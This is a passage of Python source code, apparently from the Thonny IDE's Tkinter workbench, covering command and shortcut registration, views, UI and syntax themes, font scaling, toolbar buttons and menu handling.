include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logger.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
def dispatch_if_caps_lock_is_on(event):
if caps_lock_is_on(event) and not shift_is_pressed(event):
dispatch(event)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# work around caps-lock problem
# https://github.com/thonny/thonny/issues/1347
# Unfortunately the solution doesn't work with sequences involving Shift
# (in Linux with the expected solution Shift sequences did not come through
# with Caps Lock, and in Windows, the shift handlers started to react
# on non-shift keypresses)
# Python 3.7 on Mac seems to require lower letters for shift sequences.
parts = sequence.strip("<>").split("-")
if len(parts[-1]) == 1 and parts[-1].islower() and "Shift" not in parts:
lock_sequence = "<%s-Lock-%s>" % ("-".join(parts[:-1]), parts[-1].upper())
self.bind_all(lock_sequence, dispatch_if_caps_lock_is_on, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
_disabled_image = self.get_image(image, disabled=True)
else:
_image = None
_disabled_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
# I don't like that Tk menu toggles checbutton variable
# automatically before calling the handler.
# So I revert the toggle before calling the actual handler.
# This way the handler doesn't have to worry whether it
# needs to toggle the variable or not, and it can choose to
# decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
# no image or black next to a checkbox
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
_disabled_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
view_class: Class or constructor for view. Should be callable with single
argument (the master of the view)
label: Label of the view tab
location: Location descriptor. Can be "nw", "sw", "s", "se", "ne"
Returns: None
"""
view_id = cls.__name__
if default_position_key == None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
self.set_default(f"{name}.last_configurations", [])
# assing names to related classes
proxy_class.backend_name = name # type: ignore
proxy_class.backend_description = description # type: ignore
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(tr("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(tr("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, ie. when theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
ui_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if ui_theme not in available_themes:
logger.warning("Could not find UI theme %r, switching to default", ui_theme)
ui_theme = self.get_default_ui_theme()
self.set_option("view.ui_theme", ui_theme)
self._apply_ui_theme(ui_theme)
syntax_theme = self.get_option("view.syntax_theme")
if syntax_theme not in self._syntax_themes:
logger.warning("Could not find syntax theme %r, switching to default", syntax_theme)
syntax_theme = self.get_default_syntax_theme()
self.set_option("view.syntax_theme", syntax_theme)
self._apply_syntax_theme(syntax_theme)
def get_default_ui_theme(self) -> str:
available_themes = self.get_usable_ui_theme_names()
if "Windows" in available_themes:
return "Windows"
elif running_on_rpi() and "Raspberry Pi" in available_themes:
return "Raspberry Pi"
elif "Enhanced Clam" in available_themes:
return "Enhanced Clam"
else:
return "clam"
def get_default_syntax_theme(self) -> str:
if self.uses_dark_ui_theme():
return "Default Dark"
else:
return "Default Light"
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
try:
name, _, _ = self._ui_themes[name]
except KeyError:
return False
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=tr("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
tr("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=tr("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor=get_hyperlink_cursor(),
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
tr("Regular mode"),
tr(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
master=self,
)
label.bind("<1>", on_click, True)
def _switch_backend_group(self, group):
pass
def _switch_darkness(self, mode):
pass
def _switch_to_regular_mode(self):
pass
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
If the name contains a period, then the part left to the (first) period
will become the section of the option and rest will become name under that
section.
If the name doesn't contain a period, then it will be added under section
"general".
"""
self._configuration_manager.set_default(name, default_value)
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
name: meant to be used as not translatable menu name
label: translated label, used only when menu with given name doesn't exist yet
"""
# For compatibility with plug-ins
if name in ["device", "tempdevice"] and label is None:
label = tr("Device")
if name not in self._menus:
if running_on_mac_os():
conf = {}
else:
conf = get_style_configuration("Menu")
menu = tk.Menu(self._menubar, **conf)
menu["postcommand"] = lambda: self._update_menu(menu, name)
self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
# initially the view will be in it's home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(
self, filename: str, tk_name: Optional[str] = None, disabled=False
) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
if disabled:
filename = os.path.join(
os.path.dirname(filename), "_disabled_" + os.path.basename(filename)
)
if not os.path.exists(filename):
return None
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
treeview_rowheight = self._compute_treeview_rowheight()
threshold = self.get_option("general.large_icon_rowheight_threshold")
if (
treeview_rowheight > threshold
and not filename.endswith("48.png")
or treeview_rowheight > threshold * 1.5
):
scaled_filename = filename[:-4] + "_2x.png"
scaled_filename_alt = filename[:-4] + "48.png" # used in pi theme
if os.path.exists(scaled_filename):
filename = scaled_filename
elif os.path.exists(scaled_filename_alt):
filename = scaled_filename_alt
else:
img = tk.PhotoImage(file=filename)
# can't use zoom method, because this doesn't allow name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
2,
2,
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView')"""
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto", view.home_widget, text=self._view_records[view_id]["label"] # type: ignore
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return True
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return True
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
# pylint: disable=signature-differs
if not add:
logger.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
def unbind(self, sequence: str, func=None) -> None:
# pylint: disable=arguments-differ
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logger.exception("Can't remove binding for '%s' and '%s'", sequence, func)
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return os.environ.get("THONNY_DEBUG", False) in [
"1",
1,
"True",
True,
"true",
] or self.get_option("general.debug_mode", False)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
# it may be infinity in eg. Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
# According to do documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
try:
shell = self.get_view("ShellView", create=False)
except Exception:
# shell may be not created yet
pass
else:
shell.update_tabs()
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
# Tk doesn't update Treeview row height properly, at least not in Linux Tk
style = ttk.Style()
style.configure("Treeview", rowheight=self._compute_treeview_rowheight())
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _compute_treeview_rowheight(self):
default_font = tk_font.nametofont("TkDefaultFont")
return round(default_font.metrics("linespace") * 1.15)
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
disabled_image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, ems_to_pixels(1))
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
if disabled_image is not None:
image_spec = [image, "disabled", disabled_image]
else:
image_spec = image
button = ttk.Button(
group_frame,
image=image_spec,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
def toolbar_handler(*args):
handler(*args)
self._update_toolbar()
if self.focus_get() == button:
# previously selected widget would be better candidate, but this is
# better than button
self._editor_notebook.focus_set()
button.configure(command=toolbar_handler)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self, event=None) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
if thonny._runner is None or button.tester and not button.tester():
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(row=1, column=0, sticky=tk.NSEW, in_=widget.master) # type: ignore
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
if dlg.backend_restart_required:
get_runner().restart_backend(False)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
enabled = not tester
if tester:
try:
enabled = tester()
except Exception as e:
logger.exception(
"Could not check command tester for '%s'", item_data, exc_info=e
)
traceback.print_exc()
enabled = False
if enabled:
menu.entryconfigure(i, state=tk.NORMAL)
else:
menu.entryconfigure(i, state=tk.DISABLED)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
